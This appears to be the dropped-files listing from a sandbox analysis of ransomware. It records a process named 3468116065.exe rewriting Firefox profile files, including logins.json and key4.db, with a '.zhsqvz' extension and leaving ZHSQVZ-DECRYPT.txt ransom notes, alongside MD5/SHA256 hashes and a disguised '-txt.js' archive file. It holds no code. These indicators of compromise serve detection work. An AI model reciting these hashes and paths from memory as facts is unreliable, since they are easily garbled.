SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.zhsqvz
binary
MD5: 1678397d5299a361eb3273451e838731
SHA256: 54c608bd1f1b3e73fab57f59756ac80fee381e2a3a98c2a052fe8275c2b62b75
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.zhsqvz
binary
MD5: 0c427c414fe3427404ccadbf7bec51e5
SHA256: fbc62f274d612c1db02313a2d809b79bba3a445bb081a7c30fcbac6dfd230430
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.zhsqvz
binary
MD5: 0147407037d50c504804cc0c7d392d74
SHA256: 4c6ef5f2fd54e84dc0d1a2a50a308328d6ad13d98e4763c341f011c5788fa44b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.zhsqvz
binary
MD5: af0b7555cba75a09d090a5c1303ee83b
SHA256: 036bd4a34776ab8053979def2bf2a8f7daaeac6e91ce8ef272460121032d68a1
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.zhsqvz
binary
MD5: 269a71cb16fb212dc5475bba48220908
SHA256: 96f5e2db09e0f31b0570ffc383dca7c2a781daff2c431e378e798ec1a71b0f88
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.zhsqvz
binary
MD5: c7e2ad75804bb6627748d01c1ae29bdb
SHA256: 8e6835b1696252b5dd2f7015c14da7d58bd39b701671e43c63e63bb771747d36
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.zhsqvz
binary
MD5: 6eb12c7b7bf1674c9884228324b3c421
SHA256: 026e3f97708b7d305cecacdd5f3115ed9ea235c214a5d5f6600cfead02076fca
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.zhsqvz
binary
MD5: 47efbfe7b0df7397ac001ebe117ec6c1
SHA256: 3b23bc22f5493e682c0fca92c3668ac0d1638f988e58152d6e8ccea8a711893b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.zhsqvz
binary
MD5: fba1e28cf27ea3627ea519d3f8d7a825
SHA256: e5a4317f2b5520d61f581a3f4c7e59d0edfecb1900133c4c2af6fabd5c928491
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2820
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa2820.42473\Love_You_2019_33235120-txt.js
text
MD5: 10031e28a920c0db269d390d450db6c4
SHA256: 4d6d0acc27840390ea68c6db3282b007cb34a5d6baa4eb936b68cd94b675be83
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.zhsqvz
binary
MD5: 5ea6ddaf672e07c3a63c18bc8a6168bd
SHA256: caea2a4bc64287427b589ca956f27333e0158bdef67e2d0b780182a6c90c9475
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata.zhsqvz
binary
MD5: bf72007df9aaf7aa31a36bc2f4a09edc
SHA256: 86215b09e055394052a18c27352890c17fee7c4ec09fa8099bd82338e69c1b92
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite.zhsqvz
binary
MD5: 882d92562ef06312a973235d9b406057
SHA256: f7c87c29c318dda3a8638cb909f5e1cfb217d4e2ae6e24498b9363be436c244d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\journals\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2.zhsqvz
binary
MD5: aca3236f938ae90b62ea58be1fa7de0a
SHA256: 75d41a8248b5368b9e1a321782d49e850105580b305aa282bcb6ecc6f5f22d42
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata.zhsqvz
binary
MD5: fd77d2434e51cc264bc8790b32248f55
SHA256: 7614141fe9dfeac4bfa1588e4ce85f136492eb3b5dbd8d86ef8815192144a247
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt.zhsqvz
binary
MD5: 05aae643e31d70bdc7b8428df8439265
SHA256: 0209ebe44c549424333bc4ebcd7bce16212d17efd769fa01bf64e95be770b532
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4.zhsqvz
binary
MD5: 088f217a8dbabc29aba3fcb97c33cdcd
SHA256: d1e9e90256cc6f4745e1958555555dda8f5dbd240df7d654162ed4c72e782646
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4.zhsqvz
binary
MD5: b2da4d7c4d716da9db112328edc3b718
SHA256: ba625ba668f96fdefe370b1db903cd8eab516f727fc51120d6c3eacd508077a0
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.zhsqvz
binary
MD5: dbe6fd4e069a6d368b58fef4fa060501
SHA256: db3d95d16bea1f68205e6b535b0d8ecb7a4edcc62ad36a585653a70512eb4d42
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.zhsqvz
binary
MD5: c3af94f7d61e36da4ec9c63f7fd6ee43
SHA256: 50e5c6f31eb48f4e7c01d4718a4632108e51a5475a421e8ed4d550f39251ae14
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt.zhsqvz
binary
MD5: 0cf45a40203b9fc739fbc4b0fd106867
SHA256: 9daedd275b2c2074545d65c5a763419cf2e8fdb64b3b5d1a57b124ca841a8523
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js.zhsqvz
binary
MD5: 223ba5ab63c87e7b06cff1a58cad2113
SHA256: 659dceca1710b5ec523056cc154cced33afa71273caa3f967e28e9184bfbabf3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat.zhsqvz
binary
MD5: 3f76b37cc42fe8ee864d7be95f059b6a
SHA256: f104d8250b4890903863544fe9aca8335810e389efd6e6a23f1fba91cf24346e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt.zhsqvz
binary
MD5: 3d64976af46e5394c36a9d5e74a524f2
SHA256: b6e6181f8be79e46a3c68942bd5d0f2715490d1d18c9caa018f79bceb6f55a88
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite.zhsqvz
binary
MD5: e10b24c6982ec91cf27d6fefe0a4cb30
SHA256: b0db3f3d11c7024c771770ac70e60df9023a8e99eced78ea0174c32e2e00222b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json.zhsqvz
binary
MD5: bc82dc783c0138ba9e35da0cb2666014
SHA256: 626e6c08471ef15cdb4a58f984913d8a7b8a213c1fed8c98f49a6694d7833443
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\minidumps\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db.zhsqvz
binary
MD5: 5c7eee627bff64e8ca21bc39f05819e1
SHA256: ccecdbb2811871823effbb8f952b4dee97b213f78f1b0e671ba7ca6fa80cbae3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json.zhsqvz
binary
MD5: 9419782f674105d9407377463f1b6139
SHA256: eafd13dd63f0bf3089d0d15de20d2cdf618a51d3cfc13354e720cb0bbf3692a5
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig.zhsqvz
binary
MD5: 1ced7883840dd9d4d259fd697d410a20
SHA256: 2d60eb7c72ad94454676bd32ae30f5f339747bab47df8094c2a635ab9bc2abf4
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib.zhsqvz
binary
MD5: 0fba267e50d627ca626b73917fe7592e
SHA256: e77a0c29a7f4cf025e27e12c4c968fe2d344d7edd98de718b0889180eaf3be5d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json.zhsqvz
binary
MD5: d5bad4b58252287b3067b3c31d82672c
SHA256: a4bf460fb451ca392759aec8d9a96bb1c7da4267119cca2b25c7f011091c28ea
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt.zhsqvz
binary
MD5: e42eeba1f3d9b69cd55dab674a4ce013
SHA256: 2c092e13f1c542e358cf30df5833155d29e95ebd7e303db588c50d969de7fdc9
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info.zhsqvz
binary
MD5: 5d9dafa94f16700fee953c08a1e892b1
SHA256: 9f1b9f4303aee5d1235e6507a24982323ea7d5339cc54d0c9bd806dfe57a4272
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite.zhsqvz
binary
MD5: e31b04471f3316028f2394d94ff211f3
SHA256: 737369837232e95633d9333f093f65cf8457d9bfd7f6697f094a1b9e21384d30
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\WINNT_x86-msvc\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json.zhsqvz
binary
MD5: f1dccde04375f293d89f3642aab7b975
SHA256: 69f668e8a11a5ebf603e45cb7c671c9c8d79e2113ed81ef085ab705623fc66cc
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json.zhsqvz
gpg
MD5: 3e1ef140f917672f74068f285165d674
SHA256: 319d4e3fda5dd3d9d6399c96f4f3150659cb4d646877dbcc71478b266a6f6098
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4.zhsqvz
binary
MD5: 25a00462bddf974e4fd775b948e9b7ba
SHA256: d8ee87e71fc0894728246791fc4dcebeee0468a32b9468b8f11db8ca14dd0090
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json.zhsqvz
binary
MD5: 20609da0663f09e8757cca6ce10d403f
SHA256: 26868bb5883a64752a891cbd25fcb2465823f48c20a062424b2e38d017de219a
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
